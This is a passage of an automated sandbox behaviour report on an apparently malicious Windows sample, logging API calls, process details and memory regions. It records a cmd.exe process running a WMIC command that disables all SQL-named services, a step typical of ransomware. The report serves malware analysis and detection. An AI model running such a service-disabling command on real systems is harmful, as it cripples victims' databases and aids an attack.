lpReturnSize=0x0 | out: lpAttributeList=0x450efe0, lpPreviousValue=0x0) returned 1 [0115.560] GetStartupInfoW (in: lpStartupInfo=0x450f018 | out: lpStartupInfo=0x450f018*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0115.560] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0115.560] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0115.560] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0115.560] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0115.560] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0115.560] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0115.561] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0115.561] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0115.561] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0115.561] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0115.561] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0115.561] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0115.561] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0115.561] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0115.561] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0115.561] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0115.561] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0115.561] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0115.561] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0115.561] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0115.561] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0115.561] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0115.561] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0115.561] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0115.561] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0115.561] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0115.561] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0115.561] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0115.561] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0115.561] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0115.561] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0115.561] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0115.561] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0115.561] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0115.561] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0115.561] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0115.561] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0115.561] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0115.561] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0115.562] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%SQL%'' CALL ChangeStartMode 'Disabled'", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x450ef68*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="WMIC SERVICE WHERE 'caption LIKE '%SQL%'' CALL ChangeStartMode 'Disabled'", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x450efb4 | out: lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%SQL%'' CALL ChangeStartMode 'Disabled'", lpProcessInformation=0x450efb4*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xf3c, dwThreadId=0xf40)) returned 1 [0115.568] CloseHandle (hObject=0xa4) returned 1 [0115.568] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0115.568] GetEnvironmentStringsW () returned 0x4669f60* [0115.568] FreeEnvironmentStringsA (penv="=") returned 1 [0115.568] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0116.302] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x450ef4c | out: lpExitCode=0x450ef4c*=0x0) returned 1 [0116.302] CloseHandle (hObject=0xa8) returned 1 [0116.302] _vsnwprintf (in: _Buffer=0x450f034, _BufferCount=0x13, _Format="%08X", _ArgList=0x450ef54 | out: _Buffer="00000000") returned 8 [0116.302] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0116.302] GetEnvironmentStringsW () returned 0x4667df8* [0116.302] FreeEnvironmentStringsA (penv="=") returned 1 [0116.302] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0116.302] GetEnvironmentStringsW () returned 0x4667df8* [0116.302] FreeEnvironmentStringsA (penv="=") returned 1 [0116.302] DeleteProcThreadAttributeList (in: lpAttributeList=0x450efe0 | out: lpAttributeList=0x450efe0) [0116.302] _get_osfhandle (_FileHandle=1) returned 0x3c [0116.302] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0116.303] _get_osfhandle (_FileHandle=1) returned 0x3c [0116.303] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0116.303] _get_osfhandle (_FileHandle=0) returned 0x38 [0116.303] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0116.303] SetConsoleInputExeNameW () returned 0x1 [0116.303] GetConsoleOutputCP () returned 0x1b5 [0116.303] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0116.304] SetThreadUILanguage (LangId=0x0) returned 0x409 [0116.304] exit (_Code=0) Thread: id = 259 os_tid = 0xf38 Process: id = "56" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x7e2c000" os_pid = "0xf28" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "55" os_parent_pid = "0xf20" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3643 start_va = 0x7f9ce000 end_va = 0x7f9cefff entry_point = 0x0 region_type = private name = "private_0x000000007f9ce000" filename = "" Region: id = 3644 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3645 start_va = 0xad48050000 end_va = 0xad4806ffff entry_point = 0x0 region_type = private name = "private_0x000000ad48050000" filename = "" Region: id = 3646 start_va = 0xad48070000 end_va = 0xad48083fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ad48070000" filename = "" Region: id = 3647 start_va = 0xad48090000 end_va = 0xad480cffff entry_point = 0x0 region_type = private name = "private_0x000000ad48090000" filename = "" Region: id = 3648 start_va = 0x7df5ff660000 end_va = 0x7ff5ff65ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff660000" filename = "" Region: id = 3649 start_va = 0x7ff6c48c0000 end_va = 0x7ff6c48e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c48c0000" filename = "" Region: id = 3650 start_va = 0x7ff6c48e7000 end_va = 0x7ff6c48e7fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c48e7000" filename = "" Region: id = 3651 start_va = 0x7ff6c48ee000 end_va = 0x7ff6c48effff entry_point = 0x0 region_type = private name = "private_0x00007ff6c48ee000" filename = "" Region: id = 3652 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 3653 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3654 start_va = 0xad48220000 end_va = 0xad4831ffff entry_point = 0x0 region_type = private name = "private_0x000000ad48220000" filename = "" Region: id = 3655 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3656 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3657 start_va = 0xad48050000 end_va = 0xad4805ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ad48050000" filename = "" Region: id = 3658 start_va = 0xad48060000 end_va = 0xad48066fff entry_point = 0x0 region_type = private name = "private_0x000000ad48060000" filename = "" Region: id = 3659 start_va = 0xad480d0000 end_va = 0xad4818dfff entry_point = 0xad480d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3660 start_va = 0xad48190000 end_va = 0xad481cffff entry_point = 0x0 region_type = private name = "private_0x000000ad48190000" filename = "" Region: id = 3661 start_va = 0xad481d0000 end_va = 0xad481d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ad481d0000" filename = "" Region: id = 3662 start_va = 0xad481e0000 end_va = 0xad481e6fff entry_point = 0x0 region_type = private name = "private_0x000000ad481e0000" filename = "" Region: id = 3663 start_va = 0xad481f0000 end_va = 0xad481f0fff entry_point = 0x0 region_type = private name = "private_0x000000ad481f0000" filename = "" Region: id = 3664 start_va = 0xad48200000 end_va = 0xad48200fff entry_point = 0x0 region_type = private name = "private_0x000000ad48200000" filename = "" Region: id = 3665 start_va = 0xad48320000 end_va = 0xad484a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ad48320000" filename = "" Region: id = 3666 start_va = 0xad48510000 end_va = 0xad4851ffff entry_point = 0x0 region_type = private name = "private_0x000000ad48510000" filename = "" Region: id = 3667 start_va = 0xad48520000 end_va = 0xad486a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ad48520000" filename = "" Region: id = 3668 start_va = 0xad486b0000 end_va = 0xad49aaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ad486b0000" filename = "" Region: id = 3669 start_va = 0x7ff6c47c0000 end_va = 0x7ff6c48bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c47c0000" filename = "" Region: id = 3670 start_va = 0x7ff6c48ec000 end_va = 0x7ff6c48edfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c48ec000" filename = "" Region: id = 3671 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 3672 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 3673 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3674 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3675 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3676 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3677 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3678 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3679 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3680 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3681 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3682 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 256 os_tid = 0xf2c Thread: id = 257 os_tid = 0xf30 Thread: id = 258 os_tid = 0xf34 Process: id = "57" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x67e2c000" os_pid = "0xf3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "55" os_parent_pid = "0xf20" cmd_line = "WMIC SERVICE WHERE 'caption LIKE '%SQL%'' CALL ChangeStartMode 'Disabled'" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3696 start_va = 0x430000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 3697 start_va = 0x450000 end_va = 0x451fff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 3698 start_va = 0x460000 end_va = 0x473fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3699 start_va = 0x480000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 3700 start_va = 0x4c0000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 3701 start_va = 0x500000 end_va = 0x503fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 3702 start_va = 0x510000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 3703 start_va = 0x520000 end_va = 0x521fff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 3704 start_va = 0x1300000 end_va = 0x1363fff entry_point = 0x1300000 region_type = mapped_file name = "wmic.exe" filename = "\\Windows\\SysWOW64\\wbem\\WMIC.exe" (normalized: "c:\\windows\\syswow64\\wbem\\wmic.exe") Region: id = 3705 start_va = 0x1370000 end_va = 0x536ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001370000" filename = "" Region: id = 3706 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3707 start_va = 0x7e620000 end_va = 0x7e642fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e620000" filename = "" Region: id = 3708 start_va = 0x7e646000 end_va = 0x7e646fff entry_point = 0x0 region_type = private name = "private_0x000000007e646000" filename = "" Region: id = 3709 start_va = 0x7e64c000 end_va = 0x7e64efff entry_point = 0x0 region_type = private name = "private_0x000000007e64c000" filename = "" Region: id = 3710 start_va = 0x7e64f000 end_va = 0x7e64ffff entry_point = 0x0 region_type = private name = "private_0x000000007e64f000" filename = "" Region: id = 3711 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3712 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3713 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 3714 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3715 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 3716 start_va = 0x690000 end_va = 0x69ffff entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 3717 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3718 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3719 start_va = 0x780000 end_va = 0x87ffff entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 3720 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3721 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 3722 start_va = 0x440000 end_va = 0x443fff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3723 start_va = 0x530000 end_va = 0x5edfff entry_point = 0x530000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3724 start_va = 0x5f0000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 3725 start_va = 0x630000 end_va = 0x66ffff entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 3726 start_va = 0x760000 end_va = 0x76ffff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 3727 start_va = 0x74a30000 end_va = 0x74a6efff entry_point = 0x74a30000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 3728 start_va = 0x74b60000 end_va = 0x74b67fff entry_point = 0x74b60000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 3729 start_va = 0x74b70000 end_va = 0x74b9ffff entry_point = 0x74b70000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 3730 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3731 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3732 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3733 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3734 start_va = 0x77090000 end_va = 0x77249fff entry_point = 0x77090000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3735 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3736 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3737 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3738 start_va = 0x77ad0000 end_va = 0x77ad6fff entry_point = 0x77ad0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 3739 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3740 start_va = 0x7e520000 end_va = 0x7e61ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e520000" filename = "" Region: id = 3741 start_va = 0x7e649000 end_va = 0x7e64bfff entry_point = 0x0 region_type = private name = "private_0x000000007e649000" filename = "" Region: id = 3742 start_va = 0x76f60000 end_va = 0x76f6bfff entry_point = 0x76f60000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3743 start_va = 0x450000 end_va = 0x450fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 3744 start_va = 0x77760000 end_va = 0x777e1fff entry_point = 0x77760000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 3745 start_va = 0x670000 end_va = 0x670fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 3746 start_va = 0x74a20000 end_va = 0x74a2cfff entry_point = 0x74a20000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 3747 start_va = 0x77930000 end_va = 0x7798bfff entry_point = 0x77930000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 3748 start_va = 0x749b0000 end_va = 0x74a15fff entry_point = 0x749b0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 3749 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 3750 start_va = 0x880000 end_va = 0xbb6fff entry_point = 0x880000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3751 start_va = 0x77ba0000 end_va = 0x77c31fff entry_point = 0x77ba0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 3752 start_va = 0xbc0000 end_va = 0xca8fff entry_point = 0xbc0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3753 start_va = 0x680000 end_va = 0x683fff entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 3754 start_va = 0x74820000 end_va = 0x749affff entry_point = 0x74820000 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\SysWOW64\\msxml3.dll" (normalized: "c:\\windows\\syswow64\\msxml3.dll") Region: id = 3755 start_va = 0xbc0000 end_va = 0xd1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000bc0000" filename = "" Region: id = 3756 start_va = 0x6a0000 end_va = 0x73ffff entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 3757 start_va = 0xbc0000 end_va = 0xcfffff entry_point = 0x0 region_type = private name = "private_0x0000000000bc0000" filename = "" Region: id = 3758 start_va = 0xd10000 end_va = 0xd1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d10000" filename = "" Region: id = 3759 start_va = 0xd20000 end_va = 0xf0ffff entry_point = 0x0 region_type = private name = 